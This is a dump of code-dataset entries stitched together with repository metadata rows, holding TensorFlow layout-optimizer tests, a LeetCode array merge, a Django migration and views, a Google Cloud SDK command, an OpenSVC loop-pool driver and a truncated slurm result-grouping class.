if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
condition = constant_op.constant(True)
select = gen_math_ops._select(condition, conv, add)
output = array_ops.identity(select)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithNonConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings = array_ops.placeholder(dtype='int32')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={paddings: paddings_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
paddings: paddings_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Pad-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_Pad_1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool = gen_nn_ops._max_pool_v2(conv, ksize, strides, 'VALID')
output = array_ops.identity(max_pool)
strides_val = [1, 3, 2, 1]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-MaxPoolV2-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_MaxPoolV2_2', nodes)
self.assertIn('LayoutOptimizer-MaxPoolV2-Const_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolGradV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool_grad = gen_nn_ops.max_pool_grad_v2(conv, conv, conv, ksize,
strides, 'VALID')
output = array_ops.identity(max_pool_grad)
strides_val = [1, 3, 2, 1]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-MaxPoolGradV2-0-0',
nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_MaxPoolGradV2_4',
nodes)
self.assertIn('LayoutOptimizer-MaxPoolGradV2-Const_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
size = array_ops.placeholder(dtype='int32')
s = array_ops.slice(conv, [0, 0, 0, 0], size)
output = array_ops.identity(s)
size_val = [1, 2, 3, 4]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={size: size_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
size: size_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Slice-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_Slice_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
s = array_ops.strided_slice(conv, [0, 0, 0, 0], end, strides=[1, 2, 3, 1])
output = array_ops.identity(s)
end_val = [1, 2, 3, 4]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-StridedSlice-0-0',
nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_StridedSlice_2', nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSlice/begin', nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSlice/strides', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceWithMask(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
# This will generate a StridedSlice op with begin mask and end mask.
s = conv[:, :, 1:-1, :]
output = array_ops.identity(s)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-strided_slice-0-0',
nodes)
self.assertIn('LayoutOptimizer-strided_slice-strided_slice/stack', nodes)
self.assertIn('LayoutOptimizer-strided_slice-strided_slice/stack_1',
nodes)
self.assertIn('LayoutOptimizer-strided_slice-strided_slice/stack_2',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testStridedSliceGradWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
end = array_ops.placeholder(dtype='int32')
shape = array_ops.shape(conv)
end_val = [1, 2, 3, 4]
s = array_ops.strided_slice(
conv, [0, 0, 0, 0], end_val, strides=[1, 2, 3, 1])
s_grad = array_ops.strided_slice_grad(shape, [0, 0, 0, 0], end,
[1, 2, 3, 1], s)
output = array_ops.identity(s_grad)
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={end: end_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
end: end_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-StridedSliceGrad-0-0',
nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_StridedSliceGrad_2',
nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSliceGrad/begin',
nodes)
self.assertIn('LayoutOptimizer-StridedSlice-StridedSliceGrad/strides',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testShapeN(self):
if test.is_gpu_available(cuda_only=True):
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shapen = array_ops.shape_n([conv, conv])
output = math_ops.add(shapen[0], shapen[1])
x_val = [1.7] * 784
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNCHWToNHWC-ShapeN-0-0', nodes)
self.assertAllEqual(output_val_ref, output_val)
def testLoop(self):
if test.is_gpu_available(cuda_only=True):
output = _loop()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-map/while/Conv2D-0',
nodes)
self.assertIn(
'LayoutOptimizerTransposeNCHWToNHWC-map/while/MaxPool_1-0-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithBranch(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_branch()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-map/while/Conv2D-0',
nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-map/while/Add-0-2',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testLoopWithVecAnd4D(self):
if test.is_gpu_available(cuda_only=True):
output = _loop_with_vec_and_4d()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-map/while/Conv2D-0',
nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-map/while/Add-0-2',
nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testBinaryOpSecondPort(self):
if test.is_gpu_available(cuda_only=True):
output = _model_with_second_port()
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-FusedBatchNorm-0',
nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Add-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testGradient(self):
meta_graph = _simple_metagraph()
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON)
optimized_graph = tf_optimizer.OptimizeGraph(
rewrite_options, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in ['Conv2D', 'Conv2DBackpropFilter', 'Conv2DBackpropInput']:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 5)
def testDepthwise(self):
meta_graph = _simple_metagraph(depthwise=True)
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON)
optimized_graph = tf_optimizer.OptimizeGraph(
rewrite_options, meta_graph, cluster=_get_cluster())
found = 0
for node in optimized_graph.node:
if node.op in [
'DepthwiseConv2dNative', 'DepthwiseConv2dNativeBackpropFilter',
'DepthwiseConv2dNativeBackpropInput'
]:
found += 1
self.assertEqual(node.attr['data_format'].s, b'NCHW')
self.assertEqual(found, 6)
def testCheckpointCompatibility(self):
if not test.is_gpu_available(cuda_only=True):
self.skipTest('GPU required')
checkpoint_path = self.get_temp_dir()
self._train(checkpoint_path)
vars_expected = self._train(checkpoint_path, restore=True)
vars_layout_optimized = self._train(
checkpoint_path, restore=True, layout_optimizer=True)
for var_expected, var_layout_optimized in zip(vars_expected,
vars_layout_optimized):
self.assertAllClose(var_expected, var_layout_optimized, atol=1e-6)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
6e2270dae209181b8af5ff3dcc9eea8dc4033c64 | f6ed7bc808f5536bc77166fe5c3571e5c028f308 | /neptune/internal/cli/commands/executing/null_executor.py | b7ba6ca006a08ffa645f0c58a15b0419a5cec32f | [
"Apache-2.0"
] | permissive | jiji-online/neptune-cli | d086bb59725b7545f3e0f80bd89e8f99ff3851a0 | 50cf680a80d141497f9331ab7cdaee49fcb90b0c | refs/heads/main | 2023-07-18T17:56:10.671562 | 2021-09-14T07:54:13 | 2021-09-14T07:54:13 | 406,275,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | #
# Copyright (c) 2017, deepsense.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from future.builtins import object
class NullExecutor(object):
def execute(self, experiment, args):
pass
def abort(self):
pass
| [
"[email protected]"
] | |
b70471b30ed693024129232b607386dcc2056eed | 4d05be863b63a56a90b4c46b15069827b33ecaae | /Algorithms/leetcode/088_merge_sorted_array.py | cdc7c4756f42f6563a0e1d9faa78195016a55fbc | [] | no_license | leeo1116/PyCharm | e532fa9754056019508cc454214ee1a8ad9b26a9 | b6942c05c27556e5fe47879e8b823845c84c5430 | refs/heads/master | 2022-11-06T00:43:14.882453 | 2017-07-13T04:50:00 | 2017-07-13T04:50:00 | 36,851,636 | 0 | 1 | null | 2022-10-20T10:44:39 | 2015-06-04T06:09:09 | Python | UTF-8 | Python | false | false | 775 | py | __author__ = 'Liang Li'
class Solution:
# @param {integer[]} nums1
# @param {integer} m
# @param {integer[]} nums2
# @param {integer} n
# @return {void} Do not return anything, modify nums1 in-place instead.
def merge(self, nums1, m, nums2, n):
i = m-1
j = n-1
k = m+n-1
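        # Merge from the back of nums1 so no unmerged element is overwritten before it is read.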
while i >= 0 and j >= 0:
if nums1[i] > nums2[j]:
nums1[k] = nums1[i]
i -= 1
k -= 1
else:
nums1[k] = nums2[j]
j -= 1
k -= 1
while j >= 0:
nums1[k] = nums2[j]
j -= 1
k -= 1
s = Solution()
nums1 = [2, 5, 8, 12, 0, 0, 0, 0]
nums2 = [1, 3, 4, 10]
s.merge(nums1, 4, nums2, 4)
print(nums1) | [
"[email protected]"
] | |
2316ed9192f542f72a25d3038b16c60e3271862f | 68b7d7b72a9d87123373f1e4523bf3655564769d | /backend/course/migrations/0001_initial.py | 0ce22a04074cfc9aad1aacd1a19265b0239921a5 | [] | no_license | crowdbotics-apps/help-procrastinatio-22418 | c5a85b31e85b87e9d4e39f402ca3f037d916c990 | b2a967a5b930ba5cacbeeea702ca9aba71899687 | refs/heads/master | 2023-01-09T12:19:42.589420 | 2020-11-08T23:45:22 | 2020-11-08T23:45:22 | 311,177,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,517 | py | # Generated by Django 2.2.17 on 2020-11-08 23:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(blank=True, max_length=256, null=True)),
('description', models.TextField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='course_author', to=settings.AUTH_USER_MODEL)),
('categories', models.ManyToManyField(blank=True, related_name='course_categories', to='course.Category')),
],
),
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('date', models.DateTimeField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='event_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Group',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='SubscriptionType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subscription_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_subscription_type', to='course.SubscriptionType')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subscription_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Recording',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('media', models.URLField()),
('published', models.DateTimeField()),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_event', to='course.Event')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recording_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PaymentMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary', models.BooleanField()),
('token', models.CharField(max_length=256)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='paymentmethod_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Module',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=256)),
('description', models.TextField()),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='module_course', to='course.Course')),
],
),
migrations.CreateModel(
name='Lesson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=256)),
('description', models.TextField()),
('media', models.URLField()),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lesson_module', to='course.Module')),
],
),
migrations.CreateModel(
name='Enrollment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_course', to='course.Course')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='enrollment_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
2b40da75789f55119d250b7354c69c87b1f8de71 | b23d294fdffabe72c336644f119860f5ce704eef | /python_1000phone/预科/day1-turtle/01-第一个python代码.py | bc791ddb4d9c798be10d6dc7d7d522d3d4d2a228 | [] | no_license | ikaros274556330/my_code | 65232758fd20820e9f4fa8cb5a6c91a1969862a2 | 92db21c4abcbd88b7bd77e78d9f660b4534b5071 | refs/heads/master | 2020-11-26T09:43:58.200990 | 2019-12-23T02:08:39 | 2019-12-23T02:08:39 | 229,032,315 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | # 打印hello world!
print('hello world!') | [
"[email protected]"
] | |
99681c36be3784e520c6d493f540d54bbb5b6ac4 | d8a5fc2195165c970e2340eee87ae2ad5322da29 | /{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/views.py | 48573cfdc703cc624f8d89eccaf4fa0037280c73 | [
"BSD-3-Clause"
] | permissive | lendlsmith/chrisdev-cookiecutter | b76e6194aa8369c2dbf1dac73e3282e025d2b146 | e0ab2d16bd1a066800ce46bb1740b1254c259a70 | refs/heads/master | 2021-10-11T22:20:02.391847 | 2014-07-21T16:57:32 | 2014-07-21T16:57:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | from django.views.generic import ListView, DetailView
from filer.models import Folder
class GalleryListView(ListView):
#context_object_name = "gallery_list"
try:
queryset = Folder.objects.get(
name='Gallery').children.all().order_by('-created_at')
except Folder.DoesNotExist:
queryset = None
template_name = "gallery/gallery_archive.html"
class GalleryDetailView(DetailView):
#context_object_name = "gallery"
try:
queryset = Folder.objects.get(name='Gallery').children.all()
except Folder.DoesNotExist:
queryset = None
template_name = "gallery/gallery_detail.html" | [
"[email protected]"
] | |
4528a59aa0db7486bbbf2a3cb6b8db98636d7a1b | 17e60f61fc82e7369802a1c597b58b0206ad9bec | /lib/poolLoop.py | 0a25964115c941e48f0dbddf08013eda3d965d6c | [] | no_license | SLB-DeN/opensvc | 5e06d42947f51662fa16203a00670a88b9e1fea9 | 75baeb19e0d26d5e150e770aef4d615c2327f32e | refs/heads/master | 2021-05-17T05:35:18.585791 | 2020-03-19T15:20:05 | 2020-03-19T15:20:05 | 250,651,667 | 1 | 0 | null | 2020-03-27T21:29:22 | 2020-03-27T21:29:22 | null | UTF-8 | Python | false | false | 1,366 | py | from __future__ import print_function
import os
import pool
import rcExceptions as ex
from rcUtilities import lazy, justcall
class Pool(pool.Pool):
type = "loop"
capabilities = ["rox", "rwx", "roo", "rwo", "blk"]
@lazy
def path(self):
return self.oget("path")
def translate(self, name=None, size=None, fmt=True, shared=False):
data = [
{
"rtype": "disk",
"type": "loop",
"file": os.path.join(self.path, "%s.img" % name),
"size": size,
}
]
if fmt:
data += self.add_fs(name, shared)
return data
def pool_status(self):
from converters import convert_size
if not os.path.exists(self.path):
os.makedirs(self.path)
data = {
"name": self.name,
"type": self.type,
"capabilities": self.capabilities,
}
cmd = ["df", "-P", self.path]
out, err, ret = justcall(cmd)
if ret != 0:
return data
l = out.splitlines()[-1].split()
data["free"] = convert_size(l[3], default_unit="K", _to="k")
data["used"] = convert_size(l[2], default_unit="K", _to="k")
data["size"] = convert_size(l[1], default_unit="K", _to="k")
data["head"] = self.path
return data
| [
"[email protected]"
] | |
9498aefa8f146488465c0dc49bcdcfecb6c2c61c | 3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be | /google-cloud-sdk/lib/googlecloudsdk/surface/compute/resource_views/resources/add.py | 91a1766af1560f7ca696cc64491c0c49bb5e745d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | twistedpair/google-cloud-sdk | 37f04872cf1ab9c9ce5ec692d2201a93679827e3 | 1f9b424c40a87b46656fc9f5e2e9c81895c7e614 | refs/heads/master | 2023-08-18T18:42:59.622485 | 2023-08-15T00:00:00 | 2023-08-15T12:14:05 | 116,506,777 | 58 | 24 | null | 2022-02-14T22:01:53 | 2018-01-06T18:40:35 | Python | UTF-8 | Python | false | false | 2,988 | py | # Copyright 2014 Google Inc. All Rights Reserved.
"""'resourceviews resources add' command."""
from apiclient import errors
from googlecloudsdk.api_lib.compute import rolling_updates_util as util
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
class Add(base.Command):
"""Add resources to a resource view."""
@staticmethod
def Args(parser):
"""Args is called by calliope to gather arguments for this command.
Args:
parser: An argparse parser that you can use to add arguments that go
on the command line after this command. Positional arguments are
allowed.
"""
parser.add_argument(
'resource',
nargs='+',
help=('A list of fully-qualified URLs to each resource that should '
'be added to this view. For example: '
'https://www.googleapis.com/compute/v1/projects/myproject/'
'zones/us-central1-a/instances/instance-1'))
def Run(self, args):
"""Run 'resourceviews resources add'.
Args:
args: argparse.Namespace, The arguments that this command was invoked
with.
Raises:
      HttpException: An HTTP error response was received while executing the API
          request.
      ToolException: An error other than an HTTP error occurred while executing
          the command.
"""
zone_views_client = self.context['zoneViewsClient']
region_views_client = self.context['regionViewsClient']
project = properties.VALUES.core.project.Get(required=True)
request_body = {'resources': args.resource}
if 'v1beta1' in self.context['api_version']:
if args.region:
request = region_views_client.addresources(
projectName=project,
region=args.region,
resourceViewName=args.resourceview,
body=request_body)
else:
request = zone_views_client.addresources(
projectName=project,
zone=args.zone,
resourceViewName=args.resourceview,
body=request_body)
else:
request = zone_views_client.addResources(
project=project,
zone=args.zone,
resourceView=args.resourceview,
body=request_body)
try:
request.execute()
log.Print('Resources added to resource view {0}.'.format(
args.resourceview))
except errors.HttpError as error:
raise exceptions.HttpException(util.GetError(error))
except errors.Error as error:
raise exceptions.ToolException(error)
Add.detailed_help = {
'brief': 'Add resources to a resource view.',
'DESCRIPTION': """\
This command adds resources to a resource view. You must provide a
list of fully-qualified URLs for each resource.
Alternatively, you can also use the addinstances command and provide
resource names rather than URLs.
""",
}
| [
"[email protected]"
] | |
f57a5a411bc4bd9daee914c2fc13faf4310bdc9b | 97ca8aedfc7959f99bf5add51c2fbb9d535c5aff | /tcml_tools/slurmer/parse/group.py | 6142cd427c107f81a3ddab7c8eda3c9d7558ae77 | [] | no_license | cogsys-tuebingen/tcml_tools | 74b930b8109ef0ad559584bb51808edb83fe4e8c | 4eabeb08e34993143c729136dc4349043dde00ad | refs/heads/main | 2023-06-02T02:27:13.915943 | 2021-06-09T07:01:23 | 2021-06-09T07:01:23 | 359,801,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,582 | py | import numpy as np
from typing import Union
from collections import OrderedDict, defaultdict
from tcml_tools.slurmer.parse import Result, Metrics
class Group:
"""
A group of slurm jobs that share parameters (except e.g. seed)
metrics will be computed over groups
"""
default_result = Result("__default__", -1, float_acc=1)
all_param_keys = OrderedDict()
all_result_keys = OrderedDict()
def __init__(self, name: str, ids: list, **kwargs):
self.name = name
self.ids = [int(i) for i in ids]
self.params = kwargs
self.data = defaultdict(dict)
self.results = OrderedDict()
for k in kwargs.keys():
Group.all_param_keys[k] = True
def get(self, key: str, default=None):
""" get param/result, or default otherwise """
if key in self.params:
return self.params.get(key)
if key in self.results:
return self.results.get(key).value
return default
def get_param_tuple(self, skip_keys=()) -> tuple:
""" get a tuple of all parameter-values, except for the skipped ones """
return tuple([self.params.get(k, '') for k in self.all_param_keys.keys() if k not in skip_keys])
@staticmethod
def __filter(dct: OrderedDict, ignore_keys=()) -> OrderedDict:
new_dct = dct.copy()
